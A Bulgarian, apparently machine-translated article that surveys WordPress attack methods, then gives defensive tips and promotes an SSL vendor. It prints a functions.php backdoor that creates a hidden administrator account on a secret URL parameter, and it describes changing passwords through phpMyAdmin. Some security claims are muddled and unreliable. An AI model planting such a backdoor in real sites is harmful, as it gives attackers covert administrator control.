Как да хакнем WordPress?

Въведение

Преди да започнем тази статия, бихме искали да знаете, че хакерството е незаконно и ние не мотивираме и не насърчаваме никакви злонамерени дейности. Тази статия е предназначена единствено за придобиване на знания за това как работят измамниците и как разнообразните методи за сигурност на сайта са от съществено значение за държането им настрана. Нека да обсъдим:

• Как измамниците хакват WordPress?
• Как да защитите вашия WP сайт от измамници?

И така, без да се бавим повече, нека да започнем темата.

Как да хакнете WordPress уебсайт онлайн?

(Източник: wpsecurityninja.com)

Използване на WPScan:

WPScan е скенер за сигурност на WP, който помага на собствениците на сайтове да проверяват своите WordPress сайтове за уязвимости, но този скенер се използва и от хакерите, за да изпълняват мотивите си за хакване на уебсайтове.

WPScan позволява на собствениците и администраторите на сайтове да определят потребителски акаунти в WP и пароли с груба сила и са основната стъпка за получаване на неоторизиран достъп до акаунти в WP.

(Насилствено избиране на потребителско име и парола с помощта на WPScan. Източник: Medium)

MIM атаки:

Атаките "човек по средата" (Man-in-middle, MIM) могат лесно да бъдат извършени в случай на потребители, използващи сходни локални мрежи. Некриптираните потребителски входове са лесна мишена, тъй като всички детайли са видими в обикновен текст.

Софтуерът, който участва в тези видове атаки, може да открива компрометирани теми, плъгини и да изброява потребители.

(Източник: Medium)

SQL инжекции:

Атаките с инжектиране на SQL се считат за най-известните атаки, използвани за проникване в уебсайтове. Тези атаки са насочени към вътрешните шлюзове на уебсайта и позволяват на хакерите да проникнат в тях, като изпълняват компрометирани команди.

(Източник: secure.wphackedhelp.com)

Тези пробиви също така позволяват на хакерите да променят базите данни и командите и да изтриват или крадат информация от сайта.

Тъй като при тези SQL атаки се откриват уязвими и неподправени сайтове, задачата за хакерска атака става лесна и успешна.

Използване на My SQL/cPanel:

При този метод хакерите създават фалшив акаунт или променят паролата на текущ потребител на сайта на WP. Хакерите се опитват да проникнат през контролния панел cPanel, като отварят PhpMyAdmin. Те търсят таблицата, завършваща на _users, и намират потребителя, когото искат да модифицират.

Това ще им позволи да променят идентификационните данни на потребителя, когото планират да хакнат. Те проследяват потребителя и променят паролата му (от полето user_pass), като отварят онлайн генератора MD5 и заменят същата с желаната от тях, а по-късно щракват върху #.

(Потребителските имена, хешираните пароли на потребителите, техните имейл идентификатори и т.н. се съхраняват в таблицата от базата данни wp_users. Източник: firstsiteguide.com)

Потребителските имена, хешираните пароли на потребителите, техните имейл идентификатори и т.н. се съхраняват в таблицата от базата данни wp_users.

Редактиране на Functions.php:

Хакерите също така имат достъп до контролния панел cPanel, за да променят файла Functions.php. Отключвайки файловия мениджър, те търсят папката на активната тема. От папката public_html/wp_content/themes те проследяват темата и редактират functions.php, като поставят своя компрометиран код. Хакерската атака вече е в процес на изпълнение, тъй като хакерите са създали нов акаунт. След като приключат, те изтриват компрометирания код.

Създаване на нов потребителски акаунт чрез FTP:

Като цяло FTP акаунтите помагат на собствениците на сайтове да създадат директория в рамките на своя сайт, която позволява на определени потребители да качват/изтеглят своите файлове, като използват своите данни за вход.

Тези файлове се разглеждат и в интернет.

Стъпки за създаване на FTP акаунт в сайта:

• Въведете желаните данни
• Въведете потребителското име на новия FTP потребител
• Въведете паролата за разпределяне на акаунт за достъп чрез FTP
• Въведете името на директорията за предоставяне на достъп до нея чрез FTP
• Напишете желаното пространство в MB, което искате да отделите за тази папка
• След това натиснете бутона " Create ", за да създадете нов акаунт.

Посочените по-долу данни трябва да бъдат заредени от новия потребител, за да получи достъп чрез FTP.

Адрес / Име на хост / Адрес: yourdomain.com или ftp.yourdomain.com Потребител / Потребител: [email protected] Парола: Парола El, присвоена на този FTP акаунт

Порт: 21Име на папката за качване/изтегляне на файлове.

Новият потребител ще има права за четене и запис както в избраната директория, така и във всички поддиректории, които тя съдържа. Например, ако създадете потребител клиент и му дадете достъп до / home / user / public_html

Проникване през задната врата:

Злонамереният начин за проникване в сайта е чрез задната врата. Независимо дали става въпрос за измамник, който иска да получи достъп до вашия сайт, или за потребител-жертва, който иска да възстанови достъпа до сайта си чрез влизане през задна врата, и двамата трябва да следват следните стъпки.

В случаите, когато се създава нов потребителски акаунт чрез FTP или се прави нулиране на паролата, но това не дава желаните резултати, потребителят може да иска да хакне сайта си чрез влизане през задна врата и да получи администраторския си достъп.

Стъпки за създаване на Backdoor:

• Отворете файла functions.php и поставете посочения по-долу код.

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

• По-късно запишете промените.

Crypto Jacking и добив на криптовалути:

Популярността на криптовалутите доведе до появата на нови киберзаплахи като криптоджакинг, наричан още зловреден софтуер за добив на криптовалути.

Актът на конфискуване на компютър против волята на потребителя, както и против неговото съзнание, се нарича криптокражба. При crypto-jacking измамниците заразяват компютъра на потребителя със зловреден софтуер, доставян чрез софтуер за компрометиране на системи и мрежи.

Фишинг:

Фишингът е метод, при който измамниците измамват чувствителна информация (данни за вход, номер на социална сметка, ПИН код, данни за кредитна карта и др.), като се представят за юридически лица. Обикновено те прибягват до имейли, за да изпълнят целта си.

Пример: Измамник може да се представи за надежден източник и да събира лични данни от потребителите, за да изпълни желанията си. Той може също така да постави лоша връзка във фишинг имейла и да ги насочи към измамен сайт, за да им достави зловреден софтуер.

Зловреден софтуер:

Статистиката за сигурността на WordPress показва, че 4000 WP уебсайта са заразени със зловреден софтуер поради фалшиви SEO плъгини.

Измамниците не се нуждаят от източник, за да доставят зловреден софтуер. SEO плъгините, темите на WP и много други фактори, присъстващи в сайта, са мотивирали хакерите да използват неотдавнашния зловреден софтуер WP-VCD.

Дори фишинг имейлите са портали за пренасяне на зловреден софтуер.

И тук мотивът на хакерите е един и същ - да получат чувствителни данни от потребителите, като проникнат в системите и откраднат информация.

WordPress Ransomware:

При рансъмуера WP хакерите използват зловреден софтуер, за да блокират достъпа на потребителите до системи и мрежи. Той може да бъде възстановен от потребителя чрез заплащане на искания от хакера откуп.

Пример: Атаката Petya, при която хакерът криптира вашите файлове и данни и иска откуп срещу ключа за декриптиране.

Атака с използване на скриптове в различни сайтове (XSS):

Атаките XSS се извършват от хакери чрез инжектиране на злонамерено съдържание в уебсайта, като по този начин се използва браузърът. Тази атака позволява на хакера да открадне данни от "бисквитките", да промени съдържанието на сайта и да завладее уебсайта, за да получи чувствителни данни.

Открадване на клик:

При clickjacking хакерът прави злонамерен опит да компрометира бутон/връзка и мотивира потребителя да кликне върху компрометирания обект. Това позволява на хакера да изпълни злонамерени команди за получаване на достъп до чувствителни за потребителя данни.

Споофинг:

Споофингът е атака, при която лицето се маскира като надеждна самоличност, за да извлече незаконна полза за потребителя и да го подведе да предостави поверителната си информация.

За да се предотвратят всички тези хакерски атаки, е необходимо да се вземат специални мерки за сигурност, за да се защити вашият уебсайт WP.

Как да защитим WordPress уебсайта от хакерски атаки?

(Източник: envisagedigital.co.uk)

Горепосочените статистически данни са достатъчни, за да покажат популярността на WordPress. Именно тази популярност прави тази CMS платформа по-желана сред хакерите, които опитват различни методи за хакване, за да получат достъп до уебсайтовете с WP и техните данни.

Ето защо е важно да знаете как да предотвратите достъпа на хакери до вашия WP сайт.

Подсигурете сайта на WP със SSL сертификат:

Когато в сайта се зареждат данни, те винаги са в обикновен текст, който е лесно видим за всички, включително за хакерите. Това може да е рисковано, тъй като хакерите могат да злоупотребят с данните на сайта ви.

SSL (Secure Socket Layers ) сертификатите са цифрови сертификати, които помагат за защитата на вашия WP сайт с 256-битово криптиране, като по този начин преобразуват данните на сайта ви в кодиран формат.

Хакерите не могат да четат кодове, въпреки че са получили достъп до вашия сайт, и затова са принудени да напуснат такива сайтове.

(Източник: clickssl.net)

Изберете желаната от вас марка SSL сертификат (Comodo, Thawte, RapidSSL и др.) и инсталирайте същия на вашия WP сайт. В случая с вида на SSL сертификата трябва да разбирате домейните и поддомейните. Например, ако вашият WP сайт има поддомейни, тогава един евтин Wildcard сертификат, струващ само 45 USD/годишно, може да защити целия ви цифров бизнес.

Бързо издаване, 2048-битово криптиране, повишаване на SEO оптимизацията, печат за доверие към сайта, 99% съвместимост с браузъри/мобилни устройства, политика за възстановяване на средства и гаранция са само някои от характеристиките и предимствата на инсталирането на SSL сертификати Wildcard.

Разнообразни марки и опции на SSL продукти, достъпни цени и отлично обслужване на клиентите са някои от предимствата на магазина ClickSSL за защита на вашия WP сайт.

Актуализирайте служителите си:

Човешките грешки могат да бъдат катастрофални, затова винаги следете служителите ви да бъдат информирани за най-новите киберзаплахи, за да избегнете уязвимостта им.

Ако служителите ви успеят да проследят подозрителните сигнали за хакнат уебсайт в началния етап, те могат да информират съответните лица и да предпазят сайта и бизнеса ви от по-нататъшни щети.

Използвайте двуфакторно удостоверяване (2FA):

Внедряването на 2FA по време на влизане в сайта е най-важният начин за предотвратяване на атаки с груба сила. Освен че добавят още едно ниво на сигурност, те също така предпазват сайта и данните на потребителите.

Това е така, защото ако един от слоевете за сигурност е компрометиран, измамникът трябва да проникне във втория слой, за да получи достъп до уебсайта.

Това е труден избор и затова в повечето случаи измамниците се преместват в други слабо защитени сайтове.

Съвет: WP 2FA е безплатна приставка за WP, която осигурява допълнителен слой за сигурност на вашия сайт в WP.

Редовен одит на потребителите на администратора:

Това е важно за сигурността на вашия WP сайт. Уверете се, че редовно извършвате одит на потребителите на администратора и кръстосана проверка на достъпа им.

Освен това се уверете, че потребителите и служителите ви имат ограничен достъп според задачите си, за да предотвратите пропуски в сигурността.

Редовно актуализирайте ядрото на WordPress:

Не сте наясно с WP Core?

Ще ви кажа накратко, че WP Core включва всички основни файлове, необходими за работата на WP.

Списъкът на файловете в zip файла на WP, изтеглен от WordPress.org

(Източник: ithemes.com)

Тези основни файлове трябва да се актуализират редовно след пускането на актуализации за сигурност, за да се поправят всички уязвимости в сигурността.

Изтегляне на WP теми и плъгини от надеждни източници:

Това е от ключово значение, тъй като плъгините могат да бъдат заплашителни, когато не са актуализирани или са инсталирани от ненадеждни източници. В случай на използване на безплатни/платени плъгини винаги проверявайте посочените по-долу фактори, като например:

• Оценки и отзиви на потребителите
• Удобство за потребителя
• Съвместимост
• Защита
• Достоверност

(Източник: torquemag.io)

Същото правило важи и за инсталирането на темите на WP.

Редовно актуализирайте темите и плъгините на WP:

Остарелите теми и плъгини за WP и тези с изтекъл срок на годност винаги представляват заплаха за вашия сайт с WP, тъй като губят от стандартите си за сигурност. За да не позволите на хакерите да използват такива портали за разпространение на зловреден софтуер, за да получат достъп до сайта, се погрижете редовно да актуализирате темите и плъгините, използвани във вашия WP сайт.

Това ще помогне на плъгина да функционира правилно и да се синхронизира с най-новите версии на WP.

Съвет: На страницата с плъгини можете да видите всички инсталирани плъгини и връзка, която указва, че трябва да се активира автоматичното обновяване. Включете я за автоматични актуализации.

Промяна на името на администратора по подразбиране:

Хакерите са твърде умни и могат лесно да проникнат във вашия WP сайт, като използват името на администратора по подразбиране. Винаги е за предпочитане да промените потребителското име на администратора по подразбиране, за да попречите на хакерите да изпълняват атаки с груба сила за получаване на неоторизиран достъп до вашия уебсайт.

Предоставяне на ограничен достъп:

Никога не давайте повече, отколкото е необходимо, и същото правило важи за предоставянето на достъп до сайта на потребители и служители.

Контролът на достъпа е основното правило за сигурността на сайта и данните, тъй като определя кой може или не може да има достъп до уебсайта. Блокирайте всички входове към администратора на WP и други критични кодове и данни за сигурността на сайта.

Ограниченият достъп не само повишава производителността, но и предпазва сайта ви от злонамерени влизания.

Актуализиране на WordPress:

Когато WordPress не е актуализиран, сайтът ви е изложен на риск от хакерски атаки.

WordPress владее 37% от пазарния дял и редовно пуска актуализации за отстраняване на дупки в сигурността и грешки. Актуализациите включват и нови функции и подобрения на съществуващите, които са полезни за подобряване на работата на сайта ви.

(Източник: wpbeginner.com)

Поддържайте сайта си с WP актуализиран за надеждна защита.

Приключване:

Използвайте силни и сложни пароли и поддържайте сайта си в WP, както и плъгините и темите си актуализирани, за да отстраните всички пропуски в сигурността. Отделете време за обучение на служителите си, тъй като то винаги ще помогне за предотвратяване на бедствия.

Никога не се отказвайте от сигурността и винаги се уверявайте, че използвате най-добрите и надеждни плъгини за сигурност, за да предпазите сайта си в WP от любопитни очи. Освен това подсигурете сайта си със SSL, за да повишите доверието на клиентите, бизнеса и SEO оптимизацията.

Сега, когато вече сте наясно как действат хакерите, се надяваме, че тази статия ще ви помогне да предотвратите проникването на хакери във вашия сайт и да управлявате вашия WP сайт по сигурен начин.